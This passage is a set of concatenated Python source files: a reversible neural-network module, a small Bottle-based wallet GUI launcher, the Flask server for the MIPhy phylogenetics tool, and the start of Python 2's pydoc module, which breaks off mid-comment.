torch.is_autocast_enabled() self.counter: int = 0 self.storage: typing.Dict[str, torch.Tensor] = {} self.input_args = [] self.input_kwargs = {} parameters = list(self.wrapped_module.parameters()) if fused_optimizer is None or not parameters: self.fused_optimizer = None self.fused_optimizer_step = None else: self.fused_optimizer = fused_optimizer(parameters) self.fused_optimizer_step = self.fused_optimizer.step if self.fused_optimizer is not None and not self.memory_savings: raise ValueError("Can't fuse the optimizer if RevLib doesn't modify the training graph!") if self.fused_optimizer is not None and self.cache is not None: raise ValueError("Fused optimizer is not currently supported with checkpointing and autograd-graph.") def pack(self, inp: torch.Tensor) -> str: self.counter += 1 return get_key(self.counter - 1, inp) def inner_pack(self, inp: torch.Tensor): self.storage[get_key(len(self.storage), inp)] = inp def inner_unpack(self, key: str): raise RuntimeError(f'Tensor not found.\nSpec:\n{key}') def unpack(self, key: str) -> torch.Tensor: if self.storage: if key not in self.storage: self.inner_unpack(key) return self.storage[key] x1 = self.cache.x0 y1 = self.cache.x1 with torch.random.fork_rng(self.cuda_devices): torch.set_rng_state(self.cpu_state) if self.cuda: torch.utils.checkpoint.set_device_states(self.cuda_devices, self.cuda_states) with torch.enable_grad(), torch.cuda.amp.autocast(self.autocast): with torch.autograd.graph.saved_tensors_hooks(self.inner_pack, self.inner_unpack): out = self.wrapped_module.wrapped_module(x1, *self.input_args, **self.input_kwargs) x0 = self.wrapped_module.coupling_inverse(y1, take_0th_tensor(out).detach()).detach_() self.cache(x0, x1) with torch.autograd.graph.saved_tensors_hooks(self.inner_pack, self.inner_unpack): _unused = self.wrapped_module.coupling_forward(x0, out) return self.unpack(key) def forward(self, inp: DUAL_OR_QUAD_TENSOR, *args, **kwargs) -> DUAL_OR_QUAD_TENSOR: self.input_args = args self.input_kwargs = kwargs x0, x1, *back = inp self.cpu_state = torch.get_rng_state() if self.cuda: self.cuda_devices, self.cuda_states = torch.utils.checkpoint.get_device_states(*inp) if not self.memory_savings: return x1, self.wrapped_module(x0, x1, *args, **kwargs) if self.cache is None: x0, x1, y0, y1, res = reverse_and_swap(x0, x1, *back, self.wrapped_module, self.target_device, self.cuda, self.fused_optimizer_step, args, kwargs) if res is not None: x1 = [x1] + res return x0, x1, y0, y1 self.counter = 0 self.storage = {} with torch.autograd.graph.saved_tensors_hooks(self.pack, self.unpack): y1 = self.wrapped_module(x0, x1, *args, **kwargs) out = split_tensor_list(y1) if not isinstance(out, torch.Tensor): out = out[0] self.cache(x1, out) return x1, y1 def extra_repr(self) -> str: return '\n'.join([f'coupling_forward={self.wrapped_module.coupling_forward.__name__}', f'coupling_inverse={self.wrapped_module.coupling_inverse.__name__}', f'target_device={self.target_device if self.target_device else None}']) class SingleBranchReversibleModule(ReversibleModule): def __init__(self, secondary_branch_buffer: typing.List[torch.Tensor], wrapped_module: torch.nn.Module, split_dim: int = 1, coupling_forward: typing.Optional[COUPLING] = None, coupling_inverse: typing.Optional[COUPLING] = None, memory_savings: bool = True, cache: typing.Optional[ReversibleModuleCache] = None, target_device: str = "", fused_optimizer: FUSED_OPTIMIZER = None, first: bool = False, last: bool = False): """ A wrapper around `ReversibleModule` that hides all additional outputs and pretends the model is still acting the same way it used to. Doing so requires some additional buffers which isn't as efficient as handling the RevNet buffers explicitly, but it allows seamless integration into existing models. :param secondary_branch_buffer: A buffer of tensors that's shared across all instances of `ReversibleModule`, which is used to store additional outputs which aren't returned. :param wrapped_module: The one module that's supposed to be wrapped in a reversible way. (You need multiple sequential modules to see memory gains.) :param split_dim: RevNets require two streams. This parameter specifies which dimension to split in half to create the two streams. `None` would mean the input gets replicated for both streams. It's usually best to split along the features, which is why the default (1) is compatible with convolutions. :param coupling_forward: RevNet uses y0 = (x0 + f(x1)) as a coupling function, but this allows you to set a custom one. For example, MomentumNet (https://arxiv.org/abs/2102.07870) uses y0 = (beta * x0 + (1 - beta) * f(x1)). The inputs to the coupling function are the residual stream and the function output. For more information, look at the examples. default = revnet couplint :param coupling_inverse: The inverse of the coupling function. default = revnet inverse :param memory_savings: whether to use memory savings or not. disabling results in a revnet that will allocate all intermediate tensors as a normal non-reversible network would. :param cache: an optional cache that's used to store intermediate buffers for the reversible module. if there's no cache, it will fall back to using autograd functions. :param target_device: Specifies where the parameters should be moved to before computing the forward and backward pass. This allows efficient CPU-offloading. default = no offloading (keep parameters on the device they're on) :param fused_optimizer: Allows an optimizer step to run while the model is computing its backward pass. This means that the gradients don't have to be fully instantiated anymore and can improve speed when used with cpu-offload due to asynchronous compute. It expects a function that generates an optimizer from a list of parameters. (like Adam.__init__) default = no fused optimizer step :param first: Whether it's the first module of a sequence. If so, it will initialize all buffers and make sure they're passed along. :param last: Whether it's the last module of a sequence. If so, it will run the necessary clean-up procedures to ensure pytorch's autograd will work. """ super(SingleBranchReversibleModule, self).__init__(split_dim=split_dim, wrapped_module=wrapped_module, coupling_forward=coupling_forward, coupling_inverse=coupling_inverse, memory_savings=memory_savings, cache=cache, target_device=target_device, fused_optimizer=fused_optimizer) self.secondary_branch_buffer = secondary_branch_buffer self.first = first self.last = last def forward(self, x1: torch.Tensor, *args, **kwargs) -> torch.Tensor: if self.first: self.secondary_branch_buffer.clear() x0 = back0 = torch.zeros_like(x1) back = (back0, back0) else: x0, *back = self.secondary_branch_buffer.pop() _, y1, *back = super(SingleBranchReversibleModule, self).forward((x0, x1, *back), *args, **kwargs) if self.last: if self.memory_savings and self.cache is None: out = out0 = split_tensor_list(y1) if not isinstance(out0, torch.Tensor): out = out0[0] _, out = replace_grad(x1, out, *back) if not isinstance(out0, torch.Tensor): y1 = [out] + out0[1] else: self.secondary_branch_buffer.append([x1] + back) return y1 class MergeCalls(torch.nn.Module): def __init__(self, *modules: SingleBranchReversibleModule, collate_fn: typing.Callable[[torch.Tensor, list], list]): """ MergeCalls acts the same way as nn.Sequential, but allows the usage of a custom collate function which specifies which outputs to return. It also allows arguments and keyword-arguments. Thanks to MergeCalls, it's trivial to integrate MomentumNets into existing sequential models without giving up on the custom tooling built around the models! :param modules: all modules that will be executed sequentially :param collate_fn: collate function that takes in all outputs and returns a list of tensors. """ super(MergeCalls, self).__init__() self.wrapped_modules = torch.nn.ModuleList(modules) self.collate_fn = collate_fn def forward(self, inp: torch.Tensor, *args, **kwargs) -> typing.Union[torch.Tensor, typing.List[torch.Tensor]]: out = [] for mod in self.wrapped_modules: inp = mod(inp, *args, **kwargs) inp = split_tensor_list(inp) if not isinstance(inp, torch.Tensor): out.append([inp[0]] + inp[1]) inp = inp[0] if not out: return inp return self.collate_fn(inp, out) class ReversibleSequential(torch.nn.Sequential): def __init__(self, *modules, split_dim: typing.Optional[int] = 1, coupling_forward: typing.Optional[typing.List[typing.Optional[COUPLING]]] = None, coupling_inverse: typing.Optional[typing.List[typing.Optional[COUPLING]]] = None, memory_mode: MemoryModes = MemoryModes.autograd_function, target_device: str = "", fused_optimizer: FUSED_OPTIMIZER = None): """ Wrapper around `ReversibleModule` that automatically creates a sequential RevNet as introduced in https://arxiv.org/abs/1707.04585 :param modules: All nn.Modules that should be wrapped. It's the same syntax as nn.Sequential, but adds a reversible residual stream. :param split_dim: RevNets require two streams. This parameter specifies which dimension to split in half to create the two streams. `None` would mean the input gets replicated for both streams. It's usually best to split along the features, which is why the default (1) is compatible with convolutions. :param coupling_forward: RevNet uses y0 = (x0 + f(x1)) as a coupling function, but this allows you to set a custom one. For example, MomentumNet (https://arxiv.org/abs/2102.07870) uses y0 = (beta * x0 + (1 - beta) * f(x1)). The inputs to the coupling function are the residual stream and the function output. For more information, look at the examples. default = revnet couplint :param coupling_inverse: The inverse of the coupling function. default = revnet inverse :param memory_mode: One of `MemoryModes`'s values. Some things are only supported in one mode while others might only be supported in another. default = autograd function (highest coverage but spotty XLA support) :param target_device: Specifies where the parameters should be moved to before computing the forward and backward pass. This allows efficient CPU-offloading. default = no offloading (keep parameters on the device they're on) :param fused_optimizer: Allows an optimizer step to run while the model is computing its backward pass. This means that the gradients don't have to be fully instantiated anymore and can improve speed when used with cpu-offload due to asynchronous compute. It expects a function that generates an optimizer from a list of parameters. (like Adam.__init__) default = no fused optimizer step """ super(ReversibleSequential, self).__init__() coupling_forward = list(coupling_forward) if coupling_forward else [None] coupling_inverse = list(coupling_inverse) if coupling_inverse else [None] memory_savings = memory_mode != MemoryModes.no_savings cache = ReversibleModuleCache() if memory_mode in (MemoryModes.checkpoint, MemoryModes.autograd_graph) else None self.replace_grad = replace_grad if memory_mode == MemoryModes.autograd_function else lambda *x: x for i, m in enumerate(modules): if not isinstance(m, ReversibleModule): m = ReversibleModule(m, coupling_forward[i % len(coupling_forward)], coupling_inverse[i % len(coupling_inverse)], memory_savings, copy.deepcopy(cache) if memory_mode == MemoryModes.checkpoint else cache, target_device, fused_optimizer) self.add_module(f'{i // 2}-{i % 2}', m) self.split_dim = split_dim self.m = memory_mode def forward(self, inp: torch.Tensor, *args, layerwise_args_kwargs: typing.Optional[typing.List[typing.Tuple[typing.List[typing.Any], typing.Dict[str, typing.Any]]]] = None, **kwargs) -> torch.Tensor: if self.split_dim is None: inp0 = inp1 = inp else: inp0, inp1 = inp.chunk(2, self.split_dim) zeros = torch.zeros_like(inp0) if layerwise_args_kwargs is not None: args = [list(args) + arg[0] for arg in args] kwargs = [{**kwargs, **arg[1]} for arg in args] else: args = [args] * len(self) kwargs = [kwargs] * len(self) if not args: args = [[]] * len(self) if not kwargs: kwargs = [{}] * len(self) out = inp0, inp1, zeros, zeros for mod, arg, kwarg in zip(self, args, kwargs): out = mod(out, *arg, **kwarg) return torch.cat(self.replace_grad(*out), dim=self.split_dim)
wallet.py
# -*- coding: utf-8 -*- import os import sys print(sys.stdout.encoding) sys.path.append(os.getcwd()) import io import threading import socket import bottle from bottle import request from bottle_sqlite import SQLitePlugin from app.config import * from app.routes import * bottle.install(SQLitePlugin(dbfile = Config.databasePath)) def randomPort(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("127.0.0.1", 0)) port = s.getsockname()[1] s.close() return port def serverMain(port): bottle.run(host = "0.0.0.0", port = port) port = randomPort() serverThread = threading.Thread(target=serverMain, args=(port,)) serverThread.daemon = True serverThread.start() from cefpython3 import cefpython as cef import platform import sys def cefMain(port): sys.excepthook = cef.ExceptHook # To shutdown all CEF processes on error cef.Initialize() url = "http://localhost:%s/" % port browser = cef.CreateBrowserSync(url = url, window_title = "Wallet") browser.SetClientHandler(LifespanHandler()) cef.MessageLoop() cef.Shutdown() class LifespanHandler(object): def OnBeforeClose(self, browser): print("shutdown") cefMain(port)
miphy_daemon.py
import os, sys, threading from collections import deque from random import randint from flask import Flask, request, render_template, json from miphy_resources.miphy_instance import MiphyInstance from miphy_resources.miphy_common import MiphyValidationError, MiphyRuntimeError from miphy_resources.phylo import PhyloValueError ## IF STILL not working on MacOSX (actually, do this anyways), add a command line option to specify a download location. if flag is given but empty, means cwd. if flag not given, tkinter is loaded and user can specify. If location is specified, tkinter is never imported; when saving check if file exists, increment filename to avoid overwriting. If no flag is given, and tkinter fails to import (if user doesn't have it), should default to specifying location as cwd. if sys.version_info >= (3,0): # Python 3.x imports from io import StringIO try: from tkinter import Tk as tk_root from tkinter.filedialog import asksaveasfilename as saveAs except ImportError: saveAs = None else: # Python 2.x imports try: from cStringIO import StringIO except ImportError: from StringIO import StringIO try: from Tkinter import Tk as tk_root from tkFileDialog import asksaveasfilename as saveAs except ImportError: saveAs = None def daemonURL(url): return '/daemon' + url class Daemon(object): """Background daemon to serve the miphy requests. The local version should be initialized with a server port as an integer, and with web_server left as False. The user is expected to call new_instance() and process_instance(), open a web browser (if desired), and finally call start_server() which runs the flask server, and returns when no instances remain. The web_server argument should never be set to True on a local version. If it is, the user isn't expected to do anything beyond instanciation. The program expects that the flask server will be started externally (by uwsgi) or similar, and the program isn't meant to ever end. This class defines several custom HTTP status codes used to signal errors: 550 - Specific error validating the user's tree. 551 - Error loading the user's tree file. 552 - Error parsing options or data sent from web Upload form. 558 - Unknown error validating the user's tree. 559 - A request was received with an unrecognized session ID. """ def __init__(self, server_port, web_server=False, instance_timeout_inf=False, verbose=False, downloads_dir=''): max_upload_size = 10*1024*1024 # 10 MB error_log_lines = 10000 self.server_port = server_port self.web_server = web_server self.verbose = verbose self.downloads_dir = downloads_dir self.sessions = {} # Holds the miphy instances, with session IDs as keys. if not web_server: # Running locally. self.sessionID_length = 5 # Length of the unique session ID used. self.check_interval = 3 # Repeatedly wait this many seconds between running server tasks. self.maintain_wait = 2 # Interval that the page sends a signal to maintain the miphy instance. self.allowed_wait = {'after_instance':300, 'page_load':300, 'between_checks':10} # Waits before timing out miphy instances. if instance_timeout_inf: self.allowed_wait['page_load'] = float('inf') self.server_refine_limit = None self.server_max_seqs = None else: # Live, hosted web server. self.sessionID_length = 20 self.check_interval = 10 self.maintain_wait = 9 self.allowed_wait = {'after_instance':120, 'page_load':300, 'between_checks':30} self.server_refine_limit = 3000 # Number of sequences above which the server disables the optional refine step self.server_max_seqs = 10000 # Max number of sequences for the online version # # # Activity and error logging: self.should_quit = threading.Event() self.buff_lock = threading.Lock() self.log_buffer = StringIO() self.error_log = deque([], error_log_lines) self.error_occurred = False self.signals = [] ## TESTING. i think. self.age=0 # TESTING # # # Server setup: module_dir = os.path.dirname(os.path.abspath(__file__)) resources_dir = os.path.join(module_dir, 'resources') template_dir = os.path.join(resources_dir, 'templates') static_dir = os.path.join(resources_dir, 'static') self.server = Flask(__name__, template_folder=template_dir, static_folder=static_dir) self.server.config['MAX_CONTENT_LENGTH'] = max_upload_size # # # Server listening routes: @self.server.before_first_request def setup_tasks(): if self.web_server: # Setup tasks to start for the web version. t = threading.Thread(target=self.web_tasks) t.daemon = True; t.start() else: # Setup tasks to begin for the local version. pass # # Routes used in local version only: @self.server.route('/results') def render_results(): return render_template('results.html') @self.server.route('/') def render_index(): return render_template('index.html') @self.server.route(daemonURL('/save-svg-locally'), methods=['POST']) def save_svg(): default_filename = 'miphy_tree.svg' svgData = request.form['svgData'].encode('UTF-8') if self.downloads_dir != '': # The user specified a downloads location if not os.path.isdir(self.downloads_dir): os.makedirs(self.downloads_dir) if os.path.isfile(os.path.join(self.downloads_dir, default_filename)): # File already exists, ensure it won't be overwritten basename = default_filename[:-4] file_ind = 2 while os.path.isfile(os.path.join(self.downloads_dir, '{}_{}.svg'.format(basename, file_ind))): file_ind += 1 filename = os.path.join(self.downloads_dir, '{}_{}.svg'.format(basename, file_ind)) else: filename = os.path.join(self.downloads_dir, default_filename) else: # The user didn't specify a downloads location; ask, or if unable default to cwd if saveAs == None: filename = os.path.join(os.getcwd(), default_filename) else: try: root = tk_root() root.withdraw() filename = saveAs(initialdir=os.getcwd(), initialfile=default_filename) root.destroy() except: filename = os.path.join(os.getcwd(), default_filename) if filename: if not filename.lower().endswith('.svg'): filename += '.svg' with open(filename, 'wb') as f: f.write(svgData) print('Tree image saved to {}'.format(filename)) ret_msg = 'Svg file saved to %s' % (filename) else: ret_msg = 'File not saved.' return ret_msg @self.server.route(daemonURL('/save-csv-locally'), methods=['POST']) def save_csv(): default_filename = 'miphy_data.csv' if self.downloads_dir != '': # The user specified a downloads location if not os.path.isdir(self.downloads_dir): os.makedirs(self.downloads_dir) if os.path.isfile(os.path.join(self.downloads_dir, default_filename)): # File already exists, ensure it won't be overwritten basename = default_filename[:-4] file_ind = 2 while os.path.isfile(os.path.join(self.downloads_dir, '{}_{}.csv'.format(basename, file_ind))): file_ind += 1 filename = os.path.join(self.downloads_dir, '{}_{}.csv'.format(basename, file_ind)) else: filename = os.path.join(self.downloads_dir, default_filename) else: # The user didn't specify a downloads location; ask, or if unable default to cwd if saveAs == None: filename = os.path.join(os.getcwd(), default_filename) else: try: root = tk_root() root.withdraw() filename = saveAs(initialdir=os.getcwd(), initialfile=default_filename) root.destroy() except: filename = os.path.join(os.getcwd(), default_filename) if filename: csvStr = request.form['csvStr'].encode('UTF-8') if not filename.lower().endswith('.csv'): filename += '.csv' with open(filename, 'wb') as f: f.write(csvStr) print('Score data saved to {}'.format(filename)) return 'Csv file saved to %s' % (filename) else: return 'Csv file not saved, as no filename was chosen.' # # Routes used in web version only: @self.server.route(daemonURL('/upload-files'), methods=['POST']) def upload_files(): try: gene_tree_data = request.files['tree-file'].read() info_data = request.files['info-file'].read() use_coords = request.form['usecoords'] merge = True if request.form['merge'] == 'true' else False gene_tree_format = request.form['treeformat'] except Exception as err: return (str(err), 552) if use_coords == 'true': use_coords = True elif use_coords == 'false': use_coords = False else: return ('error parsing usecoords value: "%s"' % use_coords, 552) try: idnum = self.new_instance(gene_tree_data, info_data, gene_tree_format, merge_singletons=merge, use_coords=use_coords) except MiphyValidationError as err: return (str(err), 550) except PhyloValueError as err: return (str(err), 551) except Exception as err: return (str(err), 558) numseqs = self.sessions[idnum].num_sequences spc = self.sessions[idnum].species action_msg, action_info = '', '' if self.server_max_seqs and numseqs > self.server_max_seqs: action_msg = 'over seq limit' action_info = self.server_max_seqs elif use_coords==True and self.server_refine_limit and numseqs > self.server_refine_limit: action_msg = 'over refine limit' action_info = self.server_refine_limit return json.dumps({'idnum':idnum, 'actionmsg':action_msg, 'actioninfo':action_info, 'numseqs':numseqs, 'numspc':len(spc)}) @self.server.route(daemonURL('/process-data'), methods=['POST']) def process_data(): mi, idnum, msg = self.get_instance() if mi == None: return msg merge = True if request.form['merge'] == 'true' else False params = (float(request.form['ILS']), float(request.form['dups']), float(request.form['loss']), float(request.form['spread']), merge) mi.processed(params) numseqs = mi.num_sequences return json.dumps({'numseqs':numseqs, 'numspc':len(mi.species), 'numclstrs':len(mi.clusters[params])}) @self.server.route(daemonURL('/get-sessions'), methods=['GET']) def get_sessions(): return json.dumps({'numsessions':len(self.sessions), 'keys':list(self.sessions.keys()), 'age':self.age}) # # Routes used in local and web versions: @self.server.route(daemonURL('/get-data'), methods=['POST']) def send_data(): mi, idnum, msg = self.get_instance() if mi == None: return msg info = {'maintainwait':self.maintain_wait*1000, 'speciestree':mi.species_tree_data, 'specieslist':mi.species, 'treedata':mi.tree_data, 'speciescolours':mi.species_colours, 'initweights':mi.init_weights, 'sequencenames':mi.sequence_names, 'seqspecies':mi.species_mapping, 'webversion':self.web_server, 'merge':mi.merge_singletons, 'usecoords':mi.use_coords} return json.dumps(info) @self.server.route(daemonURL('/cluster-tree'), methods=['POST']) def cluster_tree(): mi, idnum, msg = self.get_instance() if mi == None: return msg merge = True if request.form['merge'] == 'true' else False params = (float(request.form['ILS']), float(request.form['dups']), float(request.form['loss']), float(request.form['spread']), merge) mi.cluster(params) return json.dumps(mi.cluster_list[params]) @self.server.route(daemonURL('/page-loaded'), methods=['POST']) def page_loaded(): mi, idnum, msg = self.get_instance() if mi == None: return msg mi.page_loaded() return 'page-loaded successful.' @self.server.route(daemonURL('/maintain-server'), methods=['POST']) def maintain_server(): mi, idnum, msg = self.get_instance() if mi == None: return msg mi.maintain() return 'maintain-server successful.' @self.server.route(daemonURL('/instance-closed'), methods=['POST']) def instance_closed(): mi, idnum, msg = self.get_instance() if mi == None: return msg del self.sessions[idnum] if not self.web_server and len(self.sessions) == 0: self.should_quit.set() return 'instance-closed successful.' @self.server.route('/docs') def render_docs(): return render_template('/docs.html') @self.server.route('/contact') def render_contact(): return render_template('/contact.html') # # # TESTING CODE @self.server.route('/monitor') def render_monitor(): return render_template('/monitor.html') # # # END OF TESTING. def new_instance(self, gene_tree_data, info_data, gene_tree_format, merge_singletons=False, use_coords=True, coords_file=''): if type(info_data) == bytes: info_data = info_data.decode() if type(gene_tree_data) == bytes: gene_tree_data = gene_tree_data.decode() idnum = self.generateSessionID() self.sessions[idnum] = MiphyInstance(gene_tree_data, info_data, gene_tree_format, self.allowed_wait, merge_singletons, use_coords, coords_file, self.verbose, refine_limit=self.server_refine_limit) return idnum def process_instance(self, idnum, params): self.sessions[idnum].processed(params) def start_server(self): if self.web_server: return False # Only used for local version. olderr = sys.stderr sys.stderr = self.log_buffer t = threading.Thread(target=self.server.run, kwargs={'threaded':True, 'port':self.server_port}) t.daemon = True; t.start() try: while not self.should_quit.is_set(): self.should_quit.wait(self.check_interval) self.parse_err_logs() self.collect_garbage() self.parse_err_logs() if self.error_occurred: print("\nAt least one server call responded with an error. Session log:") print(''.join(self.error_log)) except Exception as error: self.parse_err_logs() print("\nPython encountered an error. Start of session log:") print(''.join(self.error_log)) print("\nEnd of session log. The error:\n"+str(error)) # raise finally: sys.stderr = olderr def web_tasks(self): if not self.web_server: return False # Only used for web version. while not self.should_quit.is_set(): self.should_quit.wait(self.check_interval) self.collect_garbage() def close(self): """Careful with this; the web version should probably never have this method actually used.""" self.should_quit.set() # # # Private methods: def get_instance(self, should_fail=False): """HTTP status code 559 is used here to indicate a response was requested for a session ID that does not exist.""" if should_fail: return None, 0, ('DEBUG ONLY: Intentional fail.', 588) idnum = request.form['session_id'] if idnum in self.sessions: return self.sessions[idnum], idnum, 'session ID is valid.' else: return None, idnum, ("error, invalid session ID %s." % idnum, 559) def generateSessionID(self): # Javascript has issues parsing a number if the string begins with a non-significant zero. idnum = ''.join([str(randint(0,9)) for i in range(self.sessionID_length)]) while idnum in self.sessions or idnum[0] == '0': idnum = ''.join([str(randint(0,9)) for i in range(self.sessionID_length)]) return idnum def collect_garbage(self): self.age += 1 # TESTING to_remove = [] for idnum, mi in self.sessions.items(): alive = mi.still_alive() if not alive: to_remove.append(idnum) for idnum in to_remove: del self.sessions[idnum] if not self.web_server: # if personal server with no live instances. if len(self.sessions) == 0: print('last MIPhy instance closed, shutting down server.') self.should_quit.set() def parse_err_logs(self): with self.buff_lock: log_data = self.log_buffer.getvalue() self.log_buffer.seek(0) self.log_buffer.truncate(0) for line in log_data.splitlines(True): if '/maintain-server HTTP/1.1" 200' not in line: retcode = line.rpartition('-')[0].strip().rpartition('"')[2].strip() if retcode not in ('200','304') and '* Running on http://' not in line: self.error_occurred = True print('\nError encountered:\n%s' % line.strip()) self.error_log.append(line) def shutdown(self): if self.tk_root: self.tk_root.destroy()
pydoc.py
#!/usr/bin/env python # -*- coding: latin-1 -*- """Generate Python documentation in HTML or text for interactive use. In the Python interpreter, do "from pydoc import help" to provide online help. Calling help(thing) on a Python object documents the object. Or, at the shell command line outside of Python: Run "pydoc <name>" to show documentation on something. <name> may be the name of a function, module, package, or a dotted reference to a class or function within a module or module in a package. If the argument contains a path segment delimiter (e.g. slash on Unix, backslash on Windows) it is treated as the path to a Python source file. Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines of all available modules. Run "pydoc -p <port>" to start an HTTP server on a given port on the local machine to generate documentation web pages. Port number 0 can be used to get an arbitrary unused port. For platforms without a command line, "pydoc -g" starts the HTTP server and also pops up a little window for controlling it. Run "pydoc -w <name>" to write out the HTML documentation for a module to a file named "<name>.html". Module docs for core modules are assumed to be in https://docs.python.org/library/ This can be overridden by setting the PYTHONDOCS environment variable to a different URL or to a local directory containing the Library Reference Manual pages. """ __author__ = "Ka-Ping Yee <ping@lfw.org>" __date__ = "26 February 2001" __version__ = "$Revision: 88564 $" __credits__ = """Guido van Rossum, for an excellent programming language. Tommy Burnette, the original creator of manpy. Paul Prescod, for all his work on onlinehelp. Richard Chamberlain, for the first implementation of textdoc. """ # Known bugs that can't be fixed here: # - imp.load_module() cannot be prevented from clobbering existing # loaded modules, so calling synopsis() on a binary module file # changes the contents of any existing module with the same name. # - If the __file__ attribute on a module is a relative path and # the current directory is changed with os.chdir(), an incorrect # path will be displayed. import sys, imp, os, re, types, inspect, __builtin__, pkgutil, warnings from repr import Repr from string import expandtabs, find, join, lower, split, strip, rfind, rstrip from traceback import extract_tb try: from collections import deque except ImportError: # Python 2.3 compatibility class deque(list): def popleft(self): return self.pop(0) # --------------------------------------------------------- common routines def pathdirs(): """Convert sys.path into a list of absolute, existing, unique paths.""" dirs = [] normdirs = [] for dir in sys.path: dir = os.path.abspath(dir or '.') normdir = os.path.normcase(dir) if normdir not in normdirs and os.path.isdir(dir): dirs.append(dir) normdirs.append(normdir) return dirs def getdoc(object): """Get the doc string or comments for an object.""" result = inspect.getdoc(object) or inspect.getcomments(object) result = _encode(result) return result and re.sub('^ *\n', '', rstrip(result)) or '' def splitdoc(doc): """Split a doc string into a synopsis line (if any) and the rest.""" lines = split(strip(doc), '\n') if len(lines) == 1: return lines[0], '' elif len(lines) >= 2 and not rstrip(lines[1]): return lines[0], join(lines[2:], '\n') return '', join(lines, '\n') def classname(object, modname): """Get a class name and qualify it with a module name if necessary.""" name = object.__name__ if object.__module__ != modname: name = object.__module__ + '.' + name return name def isdata(object): """Check if an object is of a type that probably means it's data.""" return not (inspect.ismodule(object) or inspect.isclass(object) or inspect.isroutine(object) or inspect.isframe(object) or inspect.istraceback(object) or inspect.iscode(object)) def replace(text, *pairs): """Do a series of global replacements on a string.""" while pairs: text = join(split(text, pairs[0]), pairs[1]) pairs = pairs[2:] return text def cram(text, maxlen): """Omit part of a string if needed to make it fit in a maximum length.""" if len(text) > maxlen: pre = max(0, (maxlen-3)//2) post = max(0, maxlen-3-pre) return text[:pre] + '...' + text[len(text)-post:] return text _re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE) def stripid(text): """Remove the hexadecimal id from a Python object representation.""" # The behaviour of %p is implementation-dependent in terms of case. return _re_stripid.sub(r'\1', text) def _is_some_method(obj): return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj) def allmethods(cl): methods = {} for key, value in inspect.getmembers(cl, _is_some_method): methods[key] = 1 for base in cl.__bases__: methods.update(allmethods(base)) # all your base are belong to us for key in methods.keys(): methods[key] = getattr(cl, key) return methods def _split_list(s, predicate): """Split sequence s via predicate, and return pair ([true], [false]). The return value is a 2-tuple of lists, ([x for x in s if predicate(x)], [x for x in s if not predicate(x)]) """ yes = [] no = [] for x in s: if predicate(x): yes.append(x) else: no.append(x) return yes, no def visiblename(name, all=None, obj=None): """Decide whether to show documentation on a variable.""" # Certain special names are redundant. _hidden_names = ('__builtins__', '__doc__', '__file__', '__path__', '__module__', '__name__', '__slots__', '__package__') if name in _hidden_names: return 0 # Private names are hidden, but special names are displayed. if name.startswith('__') and name.endswith('__'): return 1 # Namedtuples have public fields and methods with a single leading underscore if name.startswith('_') and hasattr(obj, '_fields'): return 1 if all is not None: # only document that which the programmer exported in __all__ return name in all else: return not name.startswith('_') def classify_class_attrs(object): """Wrap inspect.classify_class_attrs, with fixup for data descriptors.""" def fixup(data): name, kind, cls, value = data if inspect.isdatadescriptor(value): kind = 'data descriptor' return name, kind, cls, value return map(fixup, inspect.classify_class_attrs(object)) # ----------------------------------------------------- Unicode support helpers try: _unicode = unicode except NameError: # If Python is built without Unicode support, the unicode type # will not exist. Fake one that nothing will match, and make # the _encode function that do nothing. class _unicode(object): pass _encoding = 'ascii' def _encode(text, encoding='ascii'): return text else: import locale _encoding = locale.getpreferredencoding() def _encode(text, encoding=None): if isinstance(text, unicode): return text.encode(encoding or _encoding, 'xmlcharrefreplace') else: return text def _binstr(obj): # Ensure that we have an encoded (binary) string representation of obj, # even if it is a unicode string. if isinstance(obj, _unicode): return obj.encode(_encoding, 'xmlcharrefreplace') return str(obj) # ----------------------------------------------------- module manipulation def ispackage(path): """Guess whether a path refers to a package directory.""" if os.path.isdir(path): for ext in ('.py', '.pyc', '.pyo'): if os.path.isfile(os.path.join(path, '__init__' + ext)): return True return False def source_synopsis(file): line = file.readline() while line[:1] == '#' or not strip(line): line = file.readline() if not line: break line = strip(line) if line[:4] == 'r"""': line = line[1:] if line[:3] == '"""': line = line[3:] if line[-1:] == '\\': line = line[:-1] while not strip(line): line = file.readline() if not line: break result = strip(split(line, '"""')[0]) else: result = None return result def synopsis(filename, cache={}): """Get the one-line summary out of a module file.""" mtime = os.stat(filename).st_mtime lastupdate, result = cache.get(filename, (None, None)) if lastupdate is None or lastupdate < mtime: info = inspect.getmoduleinfo(filename) try: file = open(filename) except IOError: # module can't be opened, so skip it return None if info and 'b' in info[2]: # binary modules have to be imported try: module = imp.load_module('__temp__', file, filename, info[1:]) except: return None result = module.__doc__.splitlines()[0] if module.__doc__ else None del sys.modules['__temp__'] else: # text modules can be directly examined result = source_synopsis(file) file.close() cache[filename] = (mtime, result) return result class ErrorDuringImport(Exception): """Errors that occurred while trying to import something to document it.""" def __init__(self, filename, exc_info): exc, value, tb = exc_info self.filename = filename self.exc = exc self.value = value self.tb = tb def __str__(self): exc = self.exc if type(exc) is types.ClassType: exc = exc.__name__ return 'problem in %s - %s: %s' % (self.filename, exc, self.value) def importfile(path): """Import a Python source file or compiled file given its path.""" magic = imp.get_magic() file = open(path, 'r') if file.read(len(magic)) == magic: kind = imp.PY_COMPILED else: kind = imp.PY_SOURCE file.close() filename = os.path.basename(path) name, ext = os.path.splitext(filename) file = open(path, 'r') try: module = imp.load_module(name, file, path, (ext, 'r', kind)) except: raise ErrorDuringImport(path, sys.exc_info()) file.close() return module def safeimport(path, forceload=0, cache={}): """Import a module; handle errors; return None if the module isn't found. If the module *is* found but an exception occurs, it's wrapped in an ErrorDuringImport exception and reraised. Unlike __import__, if a package path is specified, the module at the end of the path is returned, not the package at the beginning. If the optional 'forceload' argument is 1, we reload the module from disk (unless it's a dynamic extension).""" try: # If forceload is 1 and the module has been previously loaded from # disk, we always have to reload the module. Checking the file's # mtime isn't good enough (e.g. the module could contain a class # that inherits from another module that has changed). if forceload and path in sys.modules: if path not in sys.builtin_module_names: # Avoid simply calling reload() because it leaves names in # the currently loaded module lying around if they're not # defined in the new source file. Instead, remove the # module from sys.modules and re-import. Also remove any # submodules because they won't appear in the newly loaded # module's namespace if they're already in sys.modules. subs = [m for m in sys.modules if m.startswith(path + '.')] for key in [path] + subs: # Prevent garbage collection. cache[key] = sys.modules[key] del sys.modules[key] module = __import__(path) except: # Did the error 